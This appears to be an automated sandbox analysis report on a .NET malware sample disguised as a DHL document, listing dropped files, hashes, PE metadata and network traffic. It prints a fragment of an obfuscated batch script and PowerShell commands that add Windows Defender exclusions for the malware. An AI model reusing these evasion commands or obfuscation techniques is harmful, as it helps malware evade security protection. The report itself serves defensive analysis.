                                                                                                                                        C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat
                                                                                                                                        Process:C:\Users\user\Desktop\DHL_document1102202068090891.exe
                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):8399
                                                                                                                                        Entropy (8bit):4.665734428420432
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                                        MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                                        SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                                        SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                                        SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                                        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators, with overstriking
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):8
                                                                                                                                        Entropy (8bit):3.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:7p2:7I
                                                                                                                                        MD5:D1F2CC85CC903AFAE9E16791EE3F2B26
                                                                                                                                        SHA1:6EB6AD0657BBC69B6594E2AD6658A0CCFDE58A04
                                                                                                                                        SHA-256:4BC19E8C1E3025FE7B027ADFB6042596A36D9C669EFE56CE027F899E4A635C0A
                                                                                                                                        SHA-512:1F640968FBE496787A1FE862E8AAD6354A2C3258E7FC14405DF1C7114158FD1AFDB6DA1FAC34456521008D00D7D8F75F56F3BA7C82ABD4886ACF586EDE07D74A
                                                                                                                                        Malicious:true
                                                                                                                                        Preview: ...L...H
                                                                                                                                        C:\Users\user\Documents\20210225\PowerShell_transcript.124406.4bCMkNpA.20210225110448.txt
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):5649
                                                                                                                                        Entropy (8bit):5.4231613802712015
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:BZ0D/FNrqDo1ZavZK/FNrqDo1Zs/NHjZs/FNrqDo1Z2K33S:5
                                                                                                                                        MD5:9762BDE81EC8299956573C81245B0247
                                                                                                                                        SHA1:722B71D405799641C901B5A233EFC74C0EA16ED2
                                                                                                                                        SHA-256:B2F3C828F1A39A968C2293A45DD56DB43AE513C232ED85F066EB40DF87359CA6
                                                                                                                                        SHA-512:2FFBCDFBF4DE00920DE5F75A57240E92F9B4E4D4B78C124998E1DF52E08C0D9EE5B79CA8660F5A9675B09AEB24A4246AE76906BDB6D9F32C25C5384EAC51B458
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225110505..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe -Force..Process ID: 6016..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225110505..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210225110745..Username: computer\alf
                                                                                                                                        C:\Users\user\Documents\20210225\PowerShell_transcript.124406.Axx9VKwJ.20210225110505.txt
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):884
                                                                                                                                        Entropy (8bit):5.337722528145989
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:BxSARDvBBFx2DOXUWeSuVyWiHjeTKKjX4CIym1ZJX+uVm:BZZv/FoO+SmFiqDYB1Zwmm
                                                                                                                                        MD5:F8A4573D1BFBAE54B6956FC412E7F3BD
                                                                                                                                        SHA1:8A89BF48C9B4E062A446C5162A06CB31D8436869
                                                                                                                                        SHA-256:A03796FEA0E2EDE037B5AE9708A869BF4596F596A7AB2BD3F8E96E7806175A55
                                                                                                                                        SHA-512:1BC03102B27E8905FDE25F5F682F430CB956562E0B60FCAFA606769493078264F0261B028D271C832021BA9ED940B3705AFB1E258D9FE533AE15589B0F1BAC51
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225110537..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\DHL_document1102202068090891.exe -Force..Process ID: 6624..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225110538..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\DHL_document1102202068090891.exe -Force..
                                                                                                                                        C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe
                                                                                                                                        Process:C:\Users\user\Desktop\DHL_document1102202068090891.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):61312
                                                                                                                                        Entropy (8bit):4.689809082227129
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:768:942TTm1gTCbgfWalSZXHIWSjSjSjSjSjSjSGAo+UHHyh:dm1gTvfWtZXoWSjSjSjSjSjSjSGA3GH
                                                                                                                                        MD5:5E86EC60BC329DB96BE8D476537A554C
                                                                                                                                        SHA1:2881B03BD6A77DC83774E29A93746B52DBB5F568
                                                                                                                                        SHA-256:5B60EEF7B62C70F68311F80199578144694445D28286C7C87E7F79ACE2875580
                                                                                                                                        SHA-512:D1EBD18AE3015614F342D5513BA672EEA9AFE414FE7B20B829B0FDB9E3522095EAEC8DF6DC15EDD9E06E911D116EF607B4DEE1A2AA2E402DFDBBC5F0A2FAE029
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bE..........."...0.............^.... ........@.. .......................@.......O....@.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H........D..T............................................................*..(....*..(....*~s ........s!........s.........*Bs....o....o"...*..0..........r...prt..p~....o....r~..pr...p~....o....~....o....r...pr...p~....o....r...pr...p~....o....~....o....~....o....r...pr...p~....o....r&..pr>..p~....o....~....o....rH..prd..p~....o....rn..pr...p~....o....~....o....~....o....~....o.....s......%r...pr...p~....o....r...pr...p~....o....~....o....r...pr5..p~....o....r?..prW..p~....o...
                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):55
                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):906
                                                                                                                                        Entropy (8bit):3.1558737103548054
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:58KRBubdpkoF1AG3rgifWFwZk9+MlWlLehB4yAq7ejCxifW41:OaqdmuF3r3fU3+kWReH4yJ7M/fD1
                                                                                                                                        MD5:CBFBD848F9B7C0C1A3D11FC1B9970537
                                                                                                                                        SHA1:6C3FA6A7C07588D13892375E065DA47601A115CB
                                                                                                                                        SHA-256:2A9C00CD9A7079247C7BE6A6938A7E62E78C91401E9CA551CA45D3F6F5D18849
                                                                                                                                        SHA-512:C74BBE822D5CCF38DBAAC21C4CBEC20655C68B869D96FD42E6030DDDD0DE86441C450D40EE83D72C91FB86A0BDBE80F6BFCAE9EEF19943F0B6D11282DDD14087
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. F.e.b. .. 2.5. .. 2.0.2.1. .1.1.:.0.5.:.3.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. F.e.b. .. 2.5. .. 2.0.2.1. .1.1.:.0.5.:.3.8.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                                                        Static File Info

                                                                                                                                        General

                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Entropy (8bit):4.689809082227129
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                        File name:DHL_document1102202068090891.exe
                                                                                                                                        File size:61312
                                                                                                                                        MD5:5e86ec60bc329db96be8d476537a554c
                                                                                                                                        SHA1:2881b03bd6a77dc83774e29a93746b52dbb5f568
                                                                                                                                        SHA256:5b60eef7b62c70f68311f80199578144694445d28286c7c87e7f79ace2875580
                                                                                                                                        SHA512:d1ebd18ae3015614f342d5513ba672eea9afe414fe7b20b829b0fdb9e3522095eaec8df6dc15edd9e06e911d116ef607b4dee1a2aa2e402dfdbbc5f0a2fae029
                                                                                                                                        SSDEEP:768:942TTm1gTCbgfWalSZXHIWSjSjSjSjSjSjSGAo+UHHyh:dm1gTvfWtZXoWSjSjSjSjSjSjSGA3GH
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bE..........."...0.............^.... ........@.. .......................@.......O....@................................

                                                                                                                                        File Icon

                                                                                                                                        Icon Hash:00828e8e8686b000

                                                                                                                                        Static PE Info

                                                                                                                                        General

                                                                                                                                        Entrypoint:0x40f05e
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:true
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                        Time Stamp:0x85456217 [Wed Nov 7 16:00:23 2040 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                        Authenticode Signature

                                                                                                                                        Signature Valid:false
                                                                                                                                        Signature Issuer:C=GmCfPFHDcuzlTjhxMdnVRJoRVgxTEsDs, S=EgqFIbFXqDyHDVRtCmJuGmDXJ, L=UhbplJmbRIqnYOVNHBPRClNvdHLCuEflyshok, T=hLhfQrYATPJmebJIjYfLhyuTgcvlTsZSKToEBnDqCsjuO, E=WxJuQdabkKtXhbEWRMIkwRvZMGeUpdlZdaZiLXuIsMY, OU=XQlvRxXJVGurkLsNjRemSVsFyTI, O=eQgmBDSwTXLOkJaQmGCQURXkrjXuCkbneQT, CN=sPaHNKCWgouQBALRgLkQHaPXNWyWuptDTrjCUMjaPuVZ
                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                        Error Number:-2146762487
                                                                                                                                        Not Before, Not After
                                                                                                                                        • 2/24/2021 5:01:32 PM 2/24/2022 5:01:32 PM
                                                                                                                                        Subject Chain
                                                                                                                                        • C=GmCfPFHDcuzlTjhxMdnVRJoRVgxTEsDs, S=EgqFIbFXqDyHDVRtCmJuGmDXJ, L=UhbplJmbRIqnYOVNHBPRClNvdHLCuEflyshok, T=hLhfQrYATPJmebJIjYfLhyuTgcvlTsZSKToEBnDqCsjuO, E=WxJuQdabkKtXhbEWRMIkwRvZMGeUpdlZdaZiLXuIsMY, OU=XQlvRxXJVGurkLsNjRemSVsFyTI, O=eQgmBDSwTXLOkJaQmGCQURXkrjXuCkbneQT, CN=sPaHNKCWgouQBALRgLkQHaPXNWyWuptDTrjCUMjaPuVZ
                                                                                                                                        Version:3
                                                                                                                                        Thumbprint MD5:4E602070677B0AC732C9F963C0C6C1BD
                                                                                                                                        Thumbprint SHA-1:A1B01DA66D0C3FBA003146324168815F7ED7B0BC
                                                                                                                                        Thumbprint SHA-256:46DA2F5B57E2DB105147FB6AE1272AA1A3B9675F3114FFDD8C6EEA1895416B3A
                                                                                                                                        Serial:00ED36AC39A8045EC2E16DBBD9A6DA3C46

                                                                                                                                        Entrypoint Preview

                                                                                                                                        Instruction
                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al

                                                                                                                                        Data Directories

                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xf0100x4b.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x3e0.rsrc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xda000x1580.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x120000xc.reloc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                        Sections

                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                        .text0x20000xd0640xd200False0.210193452381data4.27631031527IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                        .rsrc0x100000x3e00x400False0.46484375data3.53334443523IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .reloc0x120000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                        Resources

                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                        RT_VERSION0x100580x388dataEnglishUnited States

                                                                                                                                        Imports

                                                                                                                                        DLLImport
                                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                                        Version Infos

                                                                                                                                        DescriptionData
                                                                                                                                        LegalCopyrightCopyright 2022 QInfaBsH. All rights reserved.
                                                                                                                                        Assembly Version5.7.8.4
                                                                                                                                        InternalNameGecvcAeU.exe
                                                                                                                                        FileVersion3.7.5.4
                                                                                                                                        CompanyNameOlNhAoQx
                                                                                                                                        LegalTrademarksUxqlfIbn
                                                                                                                                        CommentsVbDQUczX
                                                                                                                                        ProductNameGecvcAeU
                                                                                                                                        ProductVersion5.7.8.4
                                                                                                                                        FileDescriptionNIAbCPuf
                                                                                                                                        OriginalFilenameGecvcAeU.exe
                                                                                                                                        Translation0x0409 0x0514

                                                                                                                                        Possible Origin

                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                        EnglishUnited States

                                                                                                                                        Network Behavior

                                                                                                                                        Network Port Distribution

                                                                                                                                        TCP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Feb 25, 2021 11:04:07.005327940 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.067523003 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.069052935 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.070266962 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.133971930 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.162595987 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.162636995 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.162662983 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.162688017 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.162710905 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.162734032 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.162761927 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.162796974 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.162798882 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.162825108 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.162847042 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.162863970 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.162868977 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.162916899 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.164226055 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.164264917 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.164315939 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.165750980 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.165781975 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.165848970 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.167238951 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.167272091 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.167336941 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.168759108 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.168793917 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.168900967 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.170290947 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.170325041 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.170427084 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.171825886 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.171855927 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.172027111 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.173448086 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.173476934 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.173551083 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.174873114 CET8049716172.67.172.17192.168.2.5
